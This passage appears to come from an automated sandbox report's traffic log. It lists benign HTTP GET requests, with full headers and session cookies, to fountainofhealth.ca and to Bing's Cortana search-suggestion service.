  cookie: _ga=GA1.1.1027095347.1748893175
  priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/wellness-app.gif HTTP/1.1
  host: fountainofhealth.ca
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: */*
  sec-fetch-site: none
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
  cookie: _ga=GA1.1.1027095347.1748893175
  priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2024-05/Group%209823_0.png?itok=DMkwTIJn HTTP/1.1
  host: fountainofhealth.ca
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: */*
  sec-fetch-site: none
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
  cookie: _ga=GA1.1.1027095347.1748893175
  priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/FOH%20-%20Favicon.png HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: image
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
  cookie: _ga=GA1.1.1027095347.1748893175
  cookie: cf_clearance=nwMdTichHLyc1hDR_KxKvN5K_zSRnilKdMEN9mc42aA-1748893182-1.2.1.1-GfsUnjmrMmLy4SS91FULS49Fc6m6GSkQkyY2Wcjv3BABA3SDoCPqYvCJPqM7vw.wHNh4fSiTSq3OrdaOjsJmjdIa8DuqJXhq5aQaAhu2sG8OJExXyoauQ_N_OUNtqd0l.v2s9lDQ4PYHfTL0rGirMaogtmOW7N1OYKEZUgd1bR_U0OLdg.qkgkPpNJVqAG.sg9C2WW8JTiOAO0xbyxrV5AQJ1cs4IoDKhWHcNUqYLN907SiY1dQqLDwIRK9ikciOjX2Lmc6lFs67rE8XvuvG5l7tlofCfzm4TnXWNeSSiH28ddr5vQEdjH7FwBuuJOSpS6Z_7fcQhbAxSE0qjZ7SJtvgII_xw4H6a9p.UbLowTs
  priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-11/Group%209826%20%281%29.png?itok=xYH_8dLj HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: image
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
  cookie: _ga=GA1.1.1027095347.1748893175
  cookie: cf_clearance=nwMdTichHLyc1hDR_KxKvN5K_zSRnilKdMEN9mc42aA-1748893182-1.2.1.1-GfsUnjmrMmLy4SS91FULS49Fc6m6GSkQkyY2Wcjv3BABA3SDoCPqYvCJPqM7vw.wHNh4fSiTSq3OrdaOjsJmjdIa8DuqJXhq5aQaAhu2sG8OJExXyoauQ_N_OUNtqd0l.v2s9lDQ4PYHfTL0rGirMaogtmOW7N1OYKEZUgd1bR_U0OLdg.qkgkPpNJVqAG.sg9C2WW8JTiOAO0xbyxrV5AQJ1cs4IoDKhWHcNUqYLN907SiY1dQqLDwIRK9ikciOjX2Lmc6lFs67rE8XvuvG5l7tlofCfzm4TnXWNeSSiH28ddr5vQEdjH7FwBuuJOSpS6Z_7fcQhbAxSE0qjZ7SJtvgII_xw4H6a9p.UbLowTs
  priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/FOH%20-%20Favicon.png HTTP/1.1
  host: fountainofhealth.ca
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: */*
  sec-fetch-site: none
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
  cookie: _ga=GA1.1.1027095347.1748893175
  priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29.png?itok=vf0UJVIa HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: image
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
  cookie: _ga=GA1.1.1027095347.1748893175
  cookie: cf_clearance=nwMdTichHLyc1hDR_KxKvN5K_zSRnilKdMEN9mc42aA-1748893182-1.2.1.1-GfsUnjmrMmLy4SS91FULS49Fc6m6GSkQkyY2Wcjv3BABA3SDoCPqYvCJPqM7vw.wHNh4fSiTSq3OrdaOjsJmjdIa8DuqJXhq5aQaAhu2sG8OJExXyoauQ_N_OUNtqd0l.v2s9lDQ4PYHfTL0rGirMaogtmOW7N1OYKEZUgd1bR_U0OLdg.qkgkPpNJVqAG.sg9C2WW8JTiOAO0xbyxrV5AQJ1cs4IoDKhWHcNUqYLN907SiY1dQqLDwIRK9ikciOjX2Lmc6lFs67rE8XvuvG5l7tlofCfzm4TnXWNeSSiH28ddr5vQEdjH7FwBuuJOSpS6Z_7fcQhbAxSE0qjZ7SJtvgII_xw4H6a9p.UbLowTs
  priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-11/Group%209826%20%281%29.png?itok=xYH_8dLj HTTP/1.1
  host: fountainofhealth.ca
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: */*
  sec-fetch-site: none
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
  cookie: _ga=GA1.1.1027095347.1748893175
  priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29.png?itok=vf0UJVIa HTTP/1.1
  host: fountainofhealth.ca
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: */*
  sec-fetch-site: none
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
  cookie: _ga=GA1.1.1027095347.1748893175
  priority: u=1, i
Source: global traffic HTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  origin: https://www.bing.com
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=2f3777f7&IPMID=1741339061431&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Init HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=o&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=0a7fb7675443474b93e6e79ff4d6eb08 HTTP/1.1
  host: www.bing.com
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept: */*
  accept-language: en-CH
  x-agent-deviceid: 01000A4109009A83
  x-bm-cbt: 1741339061
  x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore
  x-bm-dateformat: dd/MM/yyyy
  x-bm-devicedimensions: 784x640
  x-bm-devicedimensionslogical: 784x640
  x-bm-devicescale: 100
  x-bm-dtz: 60
  x-bm-market: CH
  x-bm-theme: 000000;0078d7
  x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75
  x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2
  x-device-isoptin: false
  x-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
  x-device-ossku: 48
  x-device-touch: false
  x-deviceid: 01000A4109009A83
  x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
  x-msedge-externalexptype: JointCoord
  x-positionertype: Desktop
  x-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-se
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=on&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=684fe7139df74817b053fa7d309b3c6b HTTP/1.1
  host: www.bing.com
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept: */*
  accept-language: en-CH
  x-agent-deviceid: 01000A4109009A83
  x-bm-cbt: 1741339061
  x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore
  x-bm-dateformat: dd/MM/yyyy
  x-bm-devicedimensions: 784x640
  x-bm-devicedimensionslogical: 784x640
  x-bm-devicescale: 100
  x-bm-dtz: 60
  x-bm-market: CH
  x-bm-theme: 000000;0078d7
  x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75
  x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2
  x-device-isoptin: false
  x-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
  x-device-ossku: 48
  x-device-touch: false
  x-deviceid: 01000A4109009A83
  x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
  x-msedge-externalexptype: JointCoord
  x-positionertype: Desktop
  x-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-s
Source: global traffic HTTP traffic detected: GET /rb/16/jnc,nj/-M-8YWX0KlEtdAHVrkTvKQHOghs.js?bu=DicweowBkwGWAYkBggGGAcEBxAEwuQHHAQ&or=w HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/FgBbpIj0thGWZOh_xFnM9i4O7ek.css?bu=C6oL0gTfBfwL4wrNCsAIaWlpaQ&or=w HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/tUCiVcVWZ-go7BLlq95YW6bKHZE.css?bu=B-IDUc4DvQJpae0D&or=w HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rb/3D/ortl,cc,nc/AptopUBu7_oVDubJxwvaIprW-lI.css?bu=A4gCjAKPAg&or=w HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=ons&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=922546595914451b8005161047e609ff HTTP/1.1
  host: www.bing.com
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept: */*
  accept-language: en-CH
  x-agent-deviceid: 01000A4109009A83
  x-bm-cbt: 1741339061
  x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore
  x-bm-dateformat: dd/MM/yyyy
  x-bm-devicedimensions: 784x640
  x-bm-devicedimensionslogical: 784x640
  x-bm-devicescale: 100
  x-bm-dtz: 60
  x-bm-market: CH
  x-bm-theme: 000000;0078d7
  x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75
  x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2
  x-device-isoptin: false
  x-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
  x-device-ossku: 48
  x-device-touch: false
  x-deviceid: 01000A4109009A83
  x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
  x-msedge-externalexptype: JointCoord
  x-positionertype: Desktop
  x-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-
Source: global traffic HTTP traffic detected: GET /rb/6i/cir3,ortl,cc,nc/ZSlq2MSN0MvVwI58OcghaoHmrE4.css?bu=M-oK4wrwCuMK1AvjCtoL4wrjCuMK5QvjCuwL4wryC-MK-AvjCv4L4wqCC-MKiAvjCvwK4wrjCssL4wqXC-MKnQvjCpEL4wrjCq0LsAvjCuMKyAu2C-MKvAu_C-MKqgzjCoQM4wrlDA&or=w HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=onsc&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=4&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=41ddb61898e64595a74bb49d95e07614 HTTP/1.1
  host: www.bing.com
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept: */*
  accept-language: en-CH
  x-agent-deviceid: 01000A4109009A83
  x-bm-cbt: 1741339061
  x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore
  x-bm-dateformat: dd/MM/yyyy
  x-bm-devicedimensions: 784x640
  x-bm-devicedimensionslogical: 784x640
  x-bm-devicescale: 100
  x-bm-dtz: 60
  x-bm-market: CH
  x-bm-theme: 000000;0078d7
  x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75
  x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2
  x-device-isoptin: false
  x-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
  x-device-ossku: 48
  x-device-touch: false
  x-deviceid: 01000A4109009A83
  x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
  x-msedge-externalexptype: JointCoord
  x-positionertype: Desktop
  x-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx
Source: global traffic HTTP traffic detected: GET /rb/6i/ortl,cc,nc/NajusmjIqB4kdLn9FmVxeS4xi2o.css?bu=CdIM4wrjCuMK4wrjCuMK4wrjCg&or=w HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /th?id=OSK.7196ec0930733746a8b3b2917d333ff0&w=80&h=80&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
  host: www.bing.com
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
  accept-language: en-CH
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/-iNIzuEypRdgRJ6xnyVHizZ3bpM.br.js HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  if-modified-since: Mon, 14 Oct 2024 19:26:35 GMT
  if-none-match: 0x8DCEC861E0B768E
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/15KwNJ1E2lA1HV6BbJRyAXYo44E.br.js HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
